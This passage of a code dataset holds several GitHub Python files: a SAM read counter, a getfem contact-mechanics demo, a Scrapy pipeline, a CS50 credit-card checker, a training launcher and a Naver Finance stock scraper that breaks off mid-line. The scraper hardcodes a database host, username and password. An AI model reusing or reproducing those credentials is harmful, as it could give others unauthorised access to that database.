\t\t\t1. discard it\n# \t2. if the value of the first column is @SQ\n# \t\t1. get the value of second colum in the line\n# \t\t2. strip the \"SN:\" from the start of the value\n# \t\t3. store the remainder of the value as a key in a dictionary with a value of 0\n# \t1. if the value of the first column is @PG\n# \t\t2. discard it\n# \t2. else (we have an alignment information line)\n# \t\t1. Place the value from column 3 from the line we read into a variable called seq_name\n# \t\t2. Place the value from column 8 from the line we read into a variable called mate_pos\n# \t\t3. If (seq_name does not contain '*' AND does not contain '0\") AND (mate_pos is between 1 and 81,000)\n# \t\t\t1. Increment the dictionary entry whose value matches the variable from column 3 and increment its value (count) by 1\n# 2. Print out the contents of the dictionary (by key and value) for any key that contains the string \"Zea\" to list the reference sequences and their number of reads with a position between 1 and 81,000\n\nimport csv\nimport sys\nimport re\n\nfilename = sys.argv[1]\n\nref_seq_dict = {}\n\nwith open (filename) as file:\n\treader = csv.reader(file, delimiter='\\t')\n\n\tfor line in reader:\n\t\tif line[0] == \"@HD\" :\n\t\t\tcontinue\n\n\t\tif line[0] == \"@PG\" :\n\t\t\tcontinue\n\n\t\tif line[0] == \"@SQ\" :\n\t\t\tsequence = line[1]\n\t\t\tsequence.strip()\n\t\t\tsequence = re.sub(r\"^[S][N][:]\", \"\", sequence)\n\t\t\tref_seq_dict[sequence]=0\n\n\t\telse:\n\t\t\tseq_name = line[2]\n\t\t\tmate_pos = line[7]\n\t\t\tif ((seq_name != '*' and seq_name != '0') and (1 <= int(mate_pos) <= 81000)):\n\t\t\t\tref_seq_dict[seq_name] += 1 \n\nfor seq in ref_seq_dict:\n\tif (seq.lower().find('zea') >= 0) :\n \t\tprint (seq,':',ref_seq_dict[seq])\n","repo_name":"RonRussell/bioinformatics","sub_path":"bat-5/bat5-5.py","file_name":"bat5-5.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44286686976","text":"import numpy as np\n\nimport getfem as gf\n\ngf.util_trace_level(1)\n\ntest_case = 1 # 0 = 2D punch on a rigid obstacle\n # 1 = 2D punch on a deformable obstacle (one slave, one master)\n # 2 = 2D with two different meshes\n # 3 = 2D with multi-body and only one mesh\n # 4 = 3D case (sphere / parallelepiped) (two meshes)\n\nclambda1 = 1. # Elasticity parameters\ncmu1 = 1.\nclambda2 = 1. # Elasticity parameters\ncmu2 = 1.\nr = 0.1 # Augmentation parameter\nalpha = 1. # Alpha coefficient for \"sliding velocity\"\nf_coeff = 0. # Friction coefficient\n\ntest_tangent_matrix = False\nnonlinear_elasticity = False\nmax_iter = 50\n\nif test_case in [0,1]:\n vf = 0.\n vf_mult = 1.\n penalty_parameter = 0.\n dirichlet_translation = -0.5\n max_res = 1e-8\n release_dist = 1.5\n self_contact = False\n load_steps = 40\nelif test_case == 3:\n vf = 0.01 # Vertical force\n vf_mult = 1.01\n penalty_parameter = 0.1\n release_dist = 0.05\n max_res = 1e-9\n self_contact = True\n load_steps = 250\nelif test_case in [2,4]:\n vf = 0.01\n vf_mult = 1.5\n penalty_parameter = 0.01\n max_res = 1e-8\n if test_case == 2:\n release_dist = 0.1\n else:\n release_dist = 5.\n self_contact = True\n load_steps = 10000\n\nif test_case == 0:\n #mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_1.mesh\")\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_2.mesh\")\nelif test_case == 1:\n #mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_1.mesh\")\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_2.mesh\")\n mesh2 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(2,1)';ORG=[-14,-5];SIZES=[28,5];NSUBDIV=[28,5]\")\nelif test_case == 2:\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/disc_with_a_hole.mesh\")\n #mesh1 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(2,1)';ORG=[-0.5,0.1];SIZES=[1,0.1];NSUBDIV=[20,2]\")\n mesh2 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(2,1)';ORG=[-0.5,0];SIZES=[1,0.1];NSUBDIV=[20,2]\")\nelif test_case == 3:\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/multi_body.mesh\")\nelif test_case == 4:\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/sphere_with_quadratic_tetra_400_elts.mesh\")\n mesh2 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(3,1)';ORG=[-15,-15,-4];SIZES=[30,30,4];NSUBDIV=[10,10,2]\")\ntwo_meshes = \"mesh2\" in locals()\n\nN = mesh1.dim()\n\nmfu1 = gf.MeshFem(mesh1, N)\nmfu1.set_classical_fem(2)\n\npre_mflambda1 = gf.MeshFem(mesh1, N)\npre_mflambda1.set_classical_fem(1)\n\nmfvm1 = gf.MeshFem(mesh1)\nmfvm1.set_classical_discontinuous_fem(1)\n\nCONTACT_BOUNDARY1 = 1\nDIRICHLET_BOUNDARY1 = 3\nborder = mesh1.outer_faces()\nif test_case >= 2:\n mesh1.set_region(CONTACT_BOUNDARY1, border)\nelse:\n normals = mesh1.normal_of_faces(border)\n contact_boundary = border[:,np.nonzero(normals[N-1] < -0.01)[0]]\n mesh1.set_region(CONTACT_BOUNDARY1, contact_boundary)\n P = mesh1.pts() # get list of mesh points coordinates\n ctop = (P[N-1,:] > 39.999) # find those on top of the object\n pidtop = np.compress(ctop, list(range(0, mesh1.nbpts())))\n ftop = mesh1.faces_from_pid(pidtop)\n mesh1.set_region(DIRICHLET_BOUNDARY1, ftop)\n\n# dol1 = pre_mflambda1.basic_dof_on_region(CONTACT_BOUNDARY1)\n# mflambda1 = gf.MeshFem(\"partial\", pre_mflambda1, dol1)\n\nmim1 = gf.MeshIm(mesh1, 4)\nmim1_contact = gf.MeshIm(mesh1, 4)\n\nif test_case not in [0,3]:\n mfu2 = gf.MeshFem(mesh2, N)\n mfu2.set_classical_fem(2)\n\n pre_mflambda2 = gf.MeshFem(mesh2, N)\n pre_mflambda2.set_classical_fem(1)\n\n mfvm2 = gf.MeshFem(mesh2)\n mfvm2.set_classical_discontinuous_fem(1)\n\n CONTACT_BOUNDARY2 = 2\n border = mesh2.outer_faces()\n if test_case != 1:\n mesh2.set_region(CONTACT_BOUNDARY2, border)\n else:\n normals = mesh2.normal_of_faces(border)\n contact_boundary = border[:,np.nonzero(normals[N-1] > 0.01)[0]]\n mesh2.set_region(CONTACT_BOUNDARY2, contact_boundary)\n dirichlet_boundary = border[:,np.nonzero(normals[N-1] < -0.01)[0]]\n DIRICHLET_BOUNDARY2 = 5\n mesh2.set_region(DIRICHLET_BOUNDARY2, dirichlet_boundary)\n\n mim2 = gf.MeshIm(mesh2, 4)\n mim2_contact = gf.MeshIm(mesh2, 4)\n\nmd = gf.Model(\"real\")\n\nF = np.zeros(N)\nF[N-1] = -vf\n\nw1_str = \"\"\nw2_str = \"\"\n\nmd.add_fem_variable(\"u1\", mfu1)\nif f_coeff > 1e-10:\n md.add_fem_data(\"w1\", mfu1)\n w1_str = \"w1\"\nmd.add_filtered_fem_variable(\"lambda1\", pre_mflambda1, CONTACT_BOUNDARY1)\n\nif nonlinear_elasticity:\n lawname = \"Ciarlet Geymonat\"\n params1 = [clambda1, cmu1, cmu1/2-clambda1/8]\n md.add_initialized_data(\"params1\", params1)\n md.add_nonlinear_elasticity_brick(mim1, \"u1\", lawname, \"params1\")\nelse:\n md.add_initialized_data(\"clambda1\", clambda1)\n md.add_initialized_data(\"cmu1\", cmu1)\n md.add_isotropic_linearized_elasticity_brick(mim1, \"u1\", \"clambda1\", \"cmu1\")\n\nif test_case == 2:\n# md.add_initialized_data(\"cpoints1\", [0 0.5 0 1.5 0 0.5 0 1.5])\n# md.add_initialized_data(\"cunitv1\", [1 0 1 0 0 1 0 1])\n# md.add_initialized_data(\"cdata\", [0 0 -0.01 -0.01])\n# md.add_pointwise_constraints_with_multipliers(\"u1\", \"cpoints1\", \"cunitv1\", \"cdata\")\n md.add_initialized_data(\"cpoints1\", [0,0.5,0,1.5])\n md.add_initialized_data(\"cunitv1\", [1,0,1,0])\n md.add_initialized_data(\"cdata\", [0,0])\n md.add_pointwise_constraints_with_multipliers(\"u1\", \"cpoints1\", \"cunitv1\", \"cdata\")\n\nmd.add_initialized_data(\"penalty_param1\", [penalty_parameter])\nmd.add_mass_brick(mim1, \"u1\", \"penalty_param1\")\nmd.add_initialized_data(\"data1\", F)\nmd.add_source_term_brick(mim1, \"u1\", \"data1\")\n\nif test_case not in [0,3]:\n md.add_fem_variable(\"u2\", mfu2)\n if f_coeff > 1e-10:\n md.add_fem_data(\"w2\", mfu2)\n w2_str = \"w2\"\n if self_contact:\n md.add_filtered_fem_variable(\"lambda2\", pre_mflambda2, CONTACT_BOUNDARY2)\n\n if nonlinear_elasticity:\n lawname = \"Ciarlet Geymonat\"\n params2 = [clambda2, cmu2, cmu2/2-clambda2/8]\n md.add_initialized_data(\"params2\", params2)\n md.add_nonlinear_elasticity_brick(mim2, \"u2\", lawname, \"params2\")\n else:\n md.add_initialized_data(\"clambda2\", clambda2)\n md.add_initialized_data(\"cmu2\", cmu2)\n\n md.add_isotropic_linearized_elasticity_brick(mim2, \"u2\", \"clambda2\", \"cmu2\")\n\n if test_case == 2:\n md.add_initialized_data(\"cpoints2\", [0,0])\n md.add_initialized_data(\"cunitv2\", [1,0])\n md.add_pointwise_constraints_with_multipliers(\"u2\", \"cpoints2\", \"cunitv2\")\n\n md.add_initialized_data(\"penalty_param2\", [penalty_parameter])\n md.add_mass_brick(mim2, \"u2\", \"penalty_param2\")\n md.add_initialized_data(\"data2\", F)\n md.add_source_term_brick(mim2, \"u2\", \"data2\")\n\n if test_case == 1:\n Ddata = np.zeros(N)\n md.add_initialized_data(\"Ddata2\", Ddata)\n md.add_Dirichlet_condition_with_multipliers(mim2, \"u2\", 1, DIRICHLET_BOUNDARY2, \"Ddata2\")\n\nif test_case <= 1:\n Ddata = np.zeros(N)\n Ddata[N-1] = dirichlet_translation\n md.add_initialized_data(\"Ddata1\", Ddata)\n md.add_Dirichlet_condition_with_multipliers(mim1, \"u1\", 1, DIRICHLET_BOUNDARY1, \"Ddata1\")\n\nmd.add_initialized_data(\"r\", r)\nmd.add_initialized_data(\"alpha\", alpha)\nmd.add_initialized_data(\"f\", f_coeff)\n\ndirect_generic_assembly = False\nif direct_generic_assembly: # Direct use of high-level generic assembly\n # TODO: account for w1, w2 when f_coeff > 0\n md.add_raytracing_transformation(\"contact_trans\", release_dist)\n if two_meshes: # The definition of a variable group is not mandatory. Just for test.\n md.define_variable_group(\"u\", \"u1\", \"u2\")\n else:\n md.define_variable_group(\"u\", \"u1\")\n\n if self_contact:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh1, \"u\", CONTACT_BOUNDARY1)\n else:\n md.add_slave_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh1, \"u\", CONTACT_BOUNDARY1)\n\n if test_case == 0:\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"80-sqrt(sqr(x)+sqr(y-80))\", N)\n elif test_case == 1:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh2, \"u\", CONTACT_BOUNDARY2)\n elif test_case == 2:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh2, \"u\", CONTACT_BOUNDARY2)\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"y+1\", N)\n elif test_case == 3:\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"2-sqrt(sqr(x)+sqr(y-1))\", N)\n elif test_case == 4:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh2, \"u\", CONTACT_BOUNDARY2)\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"z+5\", N)\n\n md.add_nonlinear_term(mim1_contact, \"-lambda1.Test_u1\", CONTACT_BOUNDARY1) \n md.add_nonlinear_term(mim1_contact, \"Interpolate_filter(contact_trans, lambda1.Interpolate(Test_u,contact_trans), 1)\", CONTACT_BOUNDARY1) \n md.add_nonlinear_term(mim1_contact, \"-(1/r)*lambda1.Test_lambda1\", CONTACT_BOUNDARY1)\n md.add_nonlinear_term(mim1_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda1, Transformed_unit_vector(Grad_u1, Normal), u1, (Interpolate(X,contact_trans)-X-u1).Transformed_unit_vector(Grad_u1, Normal), f, r).Test_lambda1, 2)\", CONTACT_BOUNDARY1)\n md.add_nonlinear_term(mim1_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda1, Transformed_unit_vector(Grad_u1, Normal), u1-Interpolate(u,contact_trans), (Interpolate(X,contact_trans)+Interpolate(u,contact_trans)-X-u1).Transformed_unit_vector(Grad_u1, Normal), f, r).Test_lambda1, 1)\", CONTACT_BOUNDARY1)\n \n if two_meshes and self_contact:\n md.add_nonlinear_term(mim2_contact, \"-lambda2.Test_u2\", CONTACT_BOUNDARY2) \n md.add_nonlinear_term(mim2_contact, \"Interpolate_filter(contact_trans, lambda2.Interpolate(Test_u,contact_trans), 1)\", CONTACT_BOUNDARY2) \n md.add_nonlinear_term(mim2_contact, \"-(1/r)*lambda2.Test_lambda2\", CONTACT_BOUNDARY2)\n md.add_nonlinear_term(mim2_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda2, Transformed_unit_vector(Grad_u2, Normal), u2, (Interpolate(X,contact_trans)-X-u2).Transformed_unit_vector(Grad_u2, Normal), f, r).Test_lambda2, 2)\", CONTACT_BOUNDARY2)\n md.add_nonlinear_term(mim2_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda2, Transformed_unit_vector(Grad_u2, Normal), u2-Interpolate(u,contact_trans), (Interpolate(X,contact_trans)+Interpolate(u,contact_trans)-X-u2).Transformed_unit_vector(Grad_u2, Normal), f, r).Test_lambda2, 1)\", CONTACT_BOUNDARY2) \n\n u_group = \"u\"\n contact_trans = \"contact_trans\"\nelse: # Use of the new contact brick which uses the high-level generic assembly\n\n ind = md.add_integral_large_sliding_contact_brick_raytracing(\"r\", release_dist, \"f\", \"alpha\", 0)\n\n if self_contact:\n md.add_master_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim1_contact, CONTACT_BOUNDARY1, \"u1\", \"lambda1\", w1_str)\n else:\n md.add_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim1_contact, CONTACT_BOUNDARY1, \"u1\", \"lambda1\", w1_str)\n\n if test_case == 0:\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"80-sqrt(sqr(x)+sqr(y-80))\", N)\n elif test_case == 1:\n md.add_master_contact_boundary_to_large_sliding_contact_brick(ind, mim2_contact, CONTACT_BOUNDARY2, \"u2\", w2_str)\n elif test_case == 2:\n md.add_master_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim2_contact, CONTACT_BOUNDARY2, \"u2\", \"lambda2\", w2_str)\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"y+1\", N)\n elif test_case == 3:\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"2-sqrt(sqr(x)+sqr(y-1))\", N)\n elif test_case == 4:\n md.add_master_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim2_contact, CONTACT_BOUNDARY2, \"u2\", \"lambda2\", w2_str)\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"z+5\", N)\n\n u_group = md.displacement_group_name_of_large_sliding_contact_brick(ind)\n contact_trans = md.transformation_name_of_large_sliding_contact_brick(ind)\n\n\nfor nit in range(load_steps):\n\n if test_tangent_matrix:\n errmax = md.test_tangent_matrix(1E-8, 20, 0.0001)\n #errmax = md.test_tangent_matrix_term(\"lambda1\", \"u1\", 1E-8, 20, 0.0001)\n print(\"errmax = %g\" % errmax)\n if errmax > 1e-3:\n print(\"bad tangent matrix\")\n\n if w1_str:\n md.set_variable(w1_str, md.variable(\"u1\"))\n if w2_str:\n md.set_variable(w2_str, md.variable(\"u2\"))\n\n print(\"SOLVING LOAD STEP %i\" % nit)\n md.solve(\"noisy\", \"max_iter\", max_iter, \"max_res\", max_res) # , \"lsearch\", \"simplest\")\n\n U1 = md.variable(\"u1\")\n if nonlinear_elasticity:\n VM1 = md.compute_Von_Mises_or_Tresca(\"u1\", lawname, \"params1\", mfvm1)\n else:\n VM1 = md.compute_isotropic_linearized_Von_Mises_or_Tresca(\"u1\", \"clambda1\", \"cmu1\", mfvm1)\n mfvm1.export_to_vtk(\"lsc_1_%i.vtk\" % nit, mfvm1, VM1,\n \"Von Mises Stresses 1\", mfu1, U1, \"Displacements 1\")\n\n lambda1 = md.variable(\"lambda1\")\n mf_lambda1 = md.mesh_fem_of_variable(\"lambda1\")\n sl = gf.Slice((\"boundary\",), mf_lambda1, CONTACT_BOUNDARY1)\n sl.export_to_vtk(\"lsc_1_boundary_%i.vtk\" % nit,\n mfu1, U1, \"BDisplacements 1\",\n mf_lambda1, lambda1, \"BMultiplier 1\")\n\n if test_case not in [0,3]:\n U2 = md.variable(\"u2\")\n if nonlinear_elasticity:\n VM2 = md.compute_Von_Mises_or_Tresca(\"u2\", lawname, \"params2\", mfvm2)\n else:\n VM2 = md.compute_isotropic_linearized_Von_Mises_or_Tresca(\"u2\", \"clambda2\", \"cmu2\", mfvm2)\n mfvm2.export_to_vtk(\"lsc_2_%i.vtk\" % nit, mfvm2, VM2,\n \"Von Mises Stresses 2\", mfu2, U2, \"Displacements 2\")\n\n sl = gf.Slice((\"boundary\",), mfu2, CONTACT_BOUNDARY2)\n sl.export_to_vtk(\"lsc_2_boundary_%i.vtk\" % nit,\n mfu2, U2, \"BDisplacements 2\")\n\n vf *= vf_mult\n F[N-1] = -vf\n md.set_variable(\"data1\", F)\n if test_case not in [0,3]:\n md.set_variable(\"data2\", F)\n\n if test_case <= 1:\n Ddata[N-1] -= 1.\n md.set_variable(\"Ddata1\", Ddata)\n","repo_name":"getfem-doc/getfem","sub_path":"interface/tests/python/demo_large_sliding_contact.py","file_name":"demo_large_sliding_contact.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"25724078359","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nfrom main.models import Country, City\n\n\nclass CrawlerPipeline(object):\n def process_item(self, data_set, spider):\n print(\"\\n\\n------- pipline-------\")\n\n if spider.name == \"country\":\n return self.handle_country(data_set)\n\n elif data_set[\"db_table\"] == \"Country\":\n return self.handle_country(data_set)\n\n elif data_set[\"db_table\"] == \"City\":\n return self.handle_city(data_set)\n\n def handle_country(self, data_set):\n print(\"-------handle_country-------\")\n\n item = Country()\n item.name = data_set[\"name\"]\n item.currency = data_set[\"currency\"]\n item.save()\n\n def handle_city(self, data_set):\n print(\"-------handle_city-------\")\n\n item = City()\n item.name = data_set[\"name\"]\n country_name = data_set[\"country_name\"]\n country = Country.objects.filter(name=country_name).last()\n item.country = country\n item.save()\n","repo_name":"mahdimohebbian/Numbeo","sub_path":"crawler/crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24549750856","text":"from cs50 import get_string\n\n# Gets number of card\ncard = get_string(\"Number: \")\nsize = len(card)\nsum = 0\n\n# Calculates Luhn's Algorithm\nfor i in range(size - 2, -1, -2):\n if (int(card[i]) * 2 > 9):\n sum += (int(card[i]) * 2) % 10\n sum += 1\n else:\n sum += int(card[i]) * 2\nfor i in range(size - 1, -1, -2):\n sum += int(card[i])\n\n# Checks if the card is valid and which card it is\nif (sum % 10 == 0):\n if (size == 15 and (card[:2] == \"34\" or card[:2] == \"37\")):\n print(\"AMEX\")\n elif (size == 16 and (card[:2] == \"51\" or card[:2] == \"52\" or card[:2] == \"53\" or card[:2] == \"54\" or card[:2] == \"55\")):\n print(\"MASTERCARD\")\n elif ((size == 13 or size == 16) and card[0] == \"4\"):\n print(\"VISA\")\n else:\n print(\"INVALID\")\nelse:\n print(\"INVALID\")\n\n\n\n","repo_name":"vicentecrespop/CS50ProblemSets","sub_path":"sentimental-credit/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8828339147","text":"import argparse\nimport json\nfrom src.configs import TrainConfig, DataConfig, ModelConfig\nfrom src.utils import train, initialize_train\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, default='./configs/default_config.json')\n\n args = parser.parse_args()\n\n with open(args.config) as config_file:\n configs = json.load(config_file)\n \n train_config = TrainConfig(**configs['train'])\n data_config = DataConfig(**configs['data'])\n model_config = ModelConfig(**configs['model'])\n\n train_params = initialize_train(train_config,data_config,model_config)\n train(**train_params)\n","repo_name":"nickdn2/CatDiffusion","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7391359976","text":"import pymysql.cursors\r\nimport urllib.request\r\nimport urllib.parse\r\nimport bs4\r\n\r\n\r\nconn = pymysql.connect(host='222.122.86.187', port=3306, user='geniuses777', password='stock7840', db='geniuses777',\r\n charset='utf8')\r\n\r\n# CJ\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=001040\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nCJ_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nCJ_data_first = CJ_data.find(\"span\", {\"class\": \"blind\"})\r\nCJ_data_realTime = CJ_data_first.text # 실시간 가격\r\nCJ_data_realTime_result = CJ_data_realTime.replace(\",\",\"\")\r\nCJ_data_realTime_int = int(CJ_data_realTime_result)\r\nprint(CJ_data_realTime_int)\r\nprint(CJ_data_realTime)\r\n\r\n# LG\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=003550\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nLG_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nLG_data_first = LG_data.find(\"span\", {\"class\": \"blind\"})\r\nLG_data_realTime = LG_data_first.text # 실시간 가격\r\nLG_data_realTime_result = LG_data_realTime.replace(\",\",\"\")\r\nLG_data_realTime_int = int(LG_data_realTime_result)\r\nprint(LG_data_realTime_int)\r\nprint(LG_data_realTime)\r\n\r\n# SK\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=034730\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nSK_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nSK_data_first = SK_data.find(\"span\", {\"class\": \"blind\"})\r\nSK_data_realTime = SK_data_first.text # 실시간 가격\r\nSK_data_realTime_result = SK_data_realTime.replace(\",\",\"\")\r\nSK_data_realTime_int = int(SK_data_realTime_result)\r\nprint(SK_data_realTime_int)\r\nprint(SK_data_realTime)\r\n\r\n# DOOSAN\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=000150\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nDOOSAN_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nDOOSAN_data_first = DOOSAN_data.find(\"span\", {\"class\": \"blind\"})\r\nDOOSAN_data_realTime = DOOSAN_data_first.text # 실시간 가격\r\nDOOSAN_data_realTime_result = DOOSAN_data_realTime.replace(\",\",\"\")\r\nDOOSAN_data_realTime_int = int(DOOSAN_data_realTime_result)\r\nprint(DOOSAN_data_realTime_int)\r\nprint(DOOSAN_data_realTime)\r\n\r\n# SAMSUNG\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=005930\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nsamsung_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nsamsung_data_first = samsung_data.find(\"span\", {\"class\": \"blind\"})\r\nsamsung_data_realTime = samsung_data_first.text # 실시간 가격\r\nsamsung_data_realTime_result = samsung_data_realTime.replace(\",\",\"\")\r\nsamsung_data_realTime_int = int(samsung_data_realTime_result)\r\nprint(samsung_data_realTime_int)\r\nprint(samsung_data_realTime)\r\n\r\n# ASIANA\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=020560\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nASIANA_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nASIANA_data_first = ASIANA_data.find(\"span\", {\"class\": \"blind\"})\r\nASIANA_data_realTime = ASIANA_data_first.text # 실시간 가격\r\nASIANA_data_realTime_result = ASIANA_data_realTime.replace(\",\",\"\")\r\nASIANA_data_realTime_int = int(ASIANA_data_realTime_result)\r\nprint(ASIANA_data_realTime_int)\r\nprint(ASIANA_data_realTime)\r\n\r\n# KAKAO\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=035720\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nKAKAO_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nKAKAO_data_first = KAKAO_data.find(\"span\", {\"class\": \"blind\"})\r\nKAKAO_data_realTime = KAKAO_data_first.text # 실시간 가격\r\nKAKAO_data_realTime_result = KAKAO_data_realTime.replace(\",\",\"\")\r\nKAKAO_data_realTime_int = int(KAKAO_data_realTime_result)\r\nprint(KAKAO_data_realTime_int)\r\nprint(KAKAO_data_realTime)\r\n\r\n# JINRO\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=000080\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nJINRO_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nJINRO_data_first = JINRO_data.find(\"span\", {\"class\": \"blind\"})\r\nJINRO_data_realTime = JINRO_data_first.text # 실시간 가격\r\nJINRO_data_realTime_result = JINRO_data_realTime.replace(\",\",\"\")\r\nJINRO_data_realTime_int = int(JINRO_data_realTime_result)\r\nprint(JINRO_data_realTime_int)\r\nprint(JINRO_data_realTime)\r\n\r\n# HANWHA\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=000880\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nHANWHA_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nHANWHA_data_first = HANWHA_data.find(\"span\", {\"class\": \"blind\"})\r\nHANWHA_data_realTime = HANWHA_data_first.text # 실시간 가격\r\nHANWHA_data_realTime_result = HANWHA_data_realTime.replace(\",\",\"\")\r\nHANWHA_data_realTime_int = int(HANWHA_data_realTime_result)\r\nprint(HANWHA_data_realTime_int)\r\nprint(HANWHA_data_realTime)\r\n\r\n# HYUNDAI\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=005380\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nHYUNDAI_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nHYUNDAI_data_first = HYUNDAI_data.find(\"span\", {\"class\": \"blind\"})\r\nHYUNDAI_data_realTime = HYUNDAI_data_first.text # 실시간 가격\r\nHYUNDAI_data_realTime_result = HYUNDAI_data_realTime.replace(\",\",\"\")\r\nHYUNDAI_data_realTime_int = int(HYUNDAI_data_realTime_result)\r\nprint(HYUNDAI_data_realTime_int)\r\nprint(HYUNDAI_data_realTime)\r\n\r\n# NAVER\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=035420\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nNAVER_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nNAVER_data_first = NAVER_data.find(\"span\", {\"class\": \"blind\"})\r\nNAVER_data_realTime = NAVER_data_first.text # 실시간 가격\r\nNAVER_data_realTime_result = NAVER_data_realTime.replace(\",\",\"\")\r\nNAVER_data_realTime_int = 